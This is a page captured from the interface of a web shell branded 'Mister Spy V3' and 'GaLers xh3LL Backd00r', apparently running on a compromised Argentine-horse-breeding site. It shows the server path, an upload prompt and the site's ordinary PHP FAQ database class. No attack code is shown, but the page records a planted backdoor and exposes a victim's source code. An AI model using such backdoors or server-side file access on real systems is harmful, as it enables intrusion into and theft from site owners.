Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/web/library/
Upload File :
Current File : /home/caballoscriollos/www/web/library/class.faqs.php

<?php 

require_once('class.dbaccess.php');
require_once('class.faq.php');
require_once('class.filter.php');
require_once('class.page.php');
require_once('class.estados.php');

class Faqs extends DBAccess implements IFilterable
{
	public function ParseFilter(array $filter)
	{
		if ($filter['Pregunta'] != '')
			$sql.= " AND f.Pregunta LIKE '%" . DB::StringUnquoted($filter['Pregunta']) . "%'";
		
		if ($filter['IdCategoria'] != "")
			$sql.= " AND f.IdCategoria = " . DB::Number($filter['IdCategoria']);
		
		return $sql;		
	}


	public function GetAll(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT f.*"; 
		$sql.= " FROM tblFaqs f";
		$sql.= " INNER JOIN tblCategorias c ON f.IdCategoria = c.IdCategoria";
		$sql.= " WHERE f.IdEstado = " . DB::Number(Estados::Activo);
		$sql.= ($filter) ? $this->ParseFilter($filter) : "";
		$sql.= " ORDER BY c.Nombre, f.Pregunta ASC";
		$sql.= ($oPage) ? Pageable::ParsePage($oPage) : "";
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;

		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oFaq = new Faq();
			$oFaq->ParseFromArray($oRow);
			
			array_push($arr, $oFaq);
			
			$oRes->MoveNext();
		}	
			
		return $arr;
	}
	

	public function GetById($IdFaq)
	{
		$sql = "SELECT f.*";
		$sql.= " FROM tblFaqs f";
		$sql.= " WHERE f.IdFaq = " . DB::Number($IdFaq);
		
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oFaq = new Faq();
		$oFaq->ParseFromArray($oRow);
		
		return $oFaq;
	}
	
	
	public function GetAllByCategoria(Categoria $oCategoria, Page $oPage = NULL)
	{
		$sql = "SELECT f.*";
		$sql.= " FROM tblFaqs f";
		$sql.= " WHERE f.IdEstado = " . DB::Number(Estados::Activo);
		$sql.= " AND f.IdCategoria = " . DB::Number($oCategoria->IdCategoria);	
		$sql.= ($oPage) ? Pageable::ParsePage($oPage) : "";
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
		
		while ($oRow = $oRes->GetRow())	
		{	
			$oFaq = new Faq();
			$oFaq->ParseFromArray($oRow);
			
			array_push($arr, $oFaq);
			
			$oRes->MoveNext();
		}	
			
		return $arr;
	}
	
	
	public function GetLastByCategoria(Categoria $oCategoria, $Cantidad)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblFaqs";
		$sql.= " WHERE IdEstado = " . DB::Number(Estados::Activo);
		$sql.= " AND IdCategoria = " . DB::Number($oCategoria->IdCategoria);	
		$sql.= " ORDER BY Pregunta ASC";
		$sql.= " LIMIT " . DB::Number($Cantidad);

		if (!($oRes = $this->GetQuery($sql)))
			return false;

		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oFaq = new Faq();
			$oFaq->ParseFromArray($oRow);
			
			array_push($arr, $oFaq);
			
			$oRes->MoveNext();
		}
			
		return $arr;
	}		
	
	
	public function GetCountRows(array $filter = NULL)
	{
		$sql = "SELECT f.*";
		$sql.= " FROM tblFaqs f";
		$sql.= " WHERE f.IdEstado = " . DB::Number(Estados::Activo);
		$sql.= ($filter) ? $this->ParseFilter($filter) : "";

		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$CountRows = $oRes->NumRows();
		
		return $CountRows;
	}
	
		
	public function Create(Faq $oFaq)
	{
		$arr = array
		(			
			'IdCategoria' 	=> DB::Number($oFaq->IdCategoria),
			'Pregunta' 		=> DB::String($oFaq->Pregunta),
			'Respuesta'		=> DB::String($oFaq->Respuesta),
			'IdEstado'		=> DB::Number(Estados::Activo)
		);
		
		if (!$this->Insert('tblFaqs', $arr))
			return false;
			
		$oFaq->IdFaq = DBAccess::GetLastInsertId();
			
		return $oFaq;
	}
	
	
	public function Update(Faq $oFaq)
	{
		$where = " IdFaq = " . DB::Number($oFaq->IdFaq);
		
		$arr = array
		(			
			'IdCategoria' 	=> DB::Number($oFaq->IdCategoria),
			'Pregunta' 		=> DB::String($oFaq->Pregunta),
			'Respuesta'		=> DB::String($oFaq->Respuesta),
			'IdEstado'		=> DB::Number($oFaq->IdEstado)
		);
		
		if (!DBAccess::UpdateEntidad('tblFaqs', $arr, $where))
			return false;
		
		return $oFaq;
	}
	

	public function Delete($IdFaq)
	{
		if (!DBAccess::$db->Begin())
			return false;
			
		$where = " IdFaq = " . DB::Number($IdFaq);

		$arr = array('IdEstado'	=> DB::Number(Estados::Eliminado));

		if (!DBAccess::UpdateEntidad('tblFaqs', $arr, $where))
		{
			DBAccess::$db->Rollback();	
			return false;
		}

		DBAccess::$db->Commit();
		
		return true;	
	}		
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat